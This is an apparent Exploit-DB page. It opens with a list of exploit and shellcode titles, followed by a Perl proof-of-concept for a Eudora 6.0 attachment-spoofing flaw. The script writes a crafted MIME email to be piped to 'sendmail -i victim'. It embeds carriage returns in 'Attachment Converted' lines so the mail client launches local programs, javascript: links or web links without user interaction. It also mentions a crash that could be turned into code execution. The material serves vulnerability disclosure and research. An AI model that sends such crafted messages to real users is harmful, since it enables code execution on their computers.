
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
111 lines
No EOL
4.7 KiB
Perl
Executable file
111 lines
No EOL
4.7 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/7653/info
|
|
|
|
Eudora is reported to be prone to an issue which may allow attackers to spoof the file extension in an attachment. This may aid an attacker in enticing a user of the e-mail client into executing malicious content.
|
|
|
|
It is possible to refer to other files or attachments in a message through specially formatted inline text.
|
|
|
|
If the CR (carriage return) character (0x0D, Ctrl-M) is embedded anywhere in the 'Attachment Converted' string, it is possible to execute message attachments without further user interaction.
|
|
|
|
#!/usr/bin/perl --
|
|
|
|
use MIME::Base64;
|
|
|
|
print "From: me\n";
|
|
print "To: you\n";
|
|
print "Subject: Eudora 6.0 on Windows exploit\n";
|
|
print "MIME-Version: 1.0\n";
|
|
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
|
|
print "\n";
|
|
print "This is a multi-part message in MIME format.\n";
|
|
print "--zzz\n";
|
|
print "Content-Type: text/plain\n";
|
|
print "Content-Transfer-Encoding: 7bit\n";
|
|
print "\n";
|
|
|
|
print "Pipe the output of this script into: sendmail -i victim\n";
|
|
|
|
print "\nQuestion: Besides In.mbx, Eudora 6.0 also keeps In.mbx.001 and
|
|
In.mbx.002 files. Any way to turn this wasteful feature off?\n";
|
|
|
|
print "\nWith spoofed attachments, we could 'steal' files if the message
|
|
was forwarded (not replied to).\n";
|
|
|
|
print "\nSending a long filename e.g.:\n";
|
|
print "Attachment Converted\r: \"\\AAA...AAA\"\n";
|
|
print "(with 250 or so repetitions of \"A\") makes Eudora crash.
|
|
Eudora is then unable to start, until the offending message is
|
|
removed from In.mbx (using some utility other than Eudora itself).
|
|
This buffer overflow can easily be made into an execute-any-code
|
|
exploit (but is not shown here for script kiddies).\n";
|
|
|
|
print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded
|
|
CR=x0d characters get converted internally into a NUL=x00 and ignored,
|
|
so we can spoof \"attachment converted\" lines:\n";
|
|
|
|
print "\nThe following work fine (but are boring and/or put up warnings):\n";
|
|
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
|
|
print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
|
|
print "(Note how JavaScript is done with IE, web with default browser Netscape)\n";
|
|
print "Attachment Converted\r: <A href=javascript:alert(%27hello%27)>hello.txt</a>\n";
|
|
print "Attachment Converted\r: <A href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
|
|
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file.txt</a>\n";
|
|
|
|
print "\nIf we can guess the full path to the attach directory then can
|
|
change the name shown to anything we like, but get broken icon:\n";
|
|
print "Attachment Converted\r: <A href=H:/windows/.eudora/attach/calc>file.txt</a>\n";
|
|
|
|
print "\nCuteness value only:\n";
|
|
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>\n";
|
|
|
|
print "\n<x-html>
|
|
With <b>HTML</b> <i>inclusions</i> we can do
|
|
<a href=c:/winnt/system32/calc.exe>file</a>,
|
|
<a href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
|
|
and
|
|
<a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
|
|
references. Any way to exploit this?
|
|
</x-html>\n";
|
|
|
|
print "\n<x-rich>
|
|
Can also do RTF inclusions. Can this be abused?
|
|
</x-rich>\n";
|
|
|
|
print "\nThose <x-xyz></x-xyz> constructs allow spoofing
|
|
attachments easily, without embedded CR:\n\n";
|
|
print "HTML\n";
|
|
print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
|
|
print "Rich\n";
|
|
print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
|
|
print "Flowed\n";
|
|
print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";
|
|
|
|
print "\n";
|
|
|
|
print "\n--zzz\n";
|
|
print "Content-Type: text/plain; name=\"plain.txt\"\n";
|
|
print "Content-Transfer-Encoding: 7bit\n";
|
|
print "Content-Disposition: inline; filename=\"plain.txt\"\n";
|
|
print "\n";
|
|
print "Within a 'plain' attachment:\n";
|
|
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
|
|
|
|
print "\n--zzz\n";
|
|
print "Content-Type: text/plain; name=\"qp.txt\"\n";
|
|
print "Content-Transfer-Encoding: quoted-printable \n";
|
|
print "Content-Disposition: inline; filename=\"qp.txt\"\n";
|
|
print "\n";
|
|
print "Within quoted-printable encoded parts still need the embedded CR:\n";
|
|
print "=41ttachment=20=43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n";
|
|
|
|
print "\n--zzz\n";
|
|
print "Content-Type: text/plain; name=\"b64.txt\"\n";
|
|
print "Content-Transfer-Encoding: base64\n";
|
|
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
|
|
print "\n";
|
|
$z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r
|
|
without embedded CR (but line termination is CR-NL):\r
|
|
Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
|
|
print encode_base64($z);
|
|
|
|
print "\n--zzz--\n";
|
|
print "\n"; |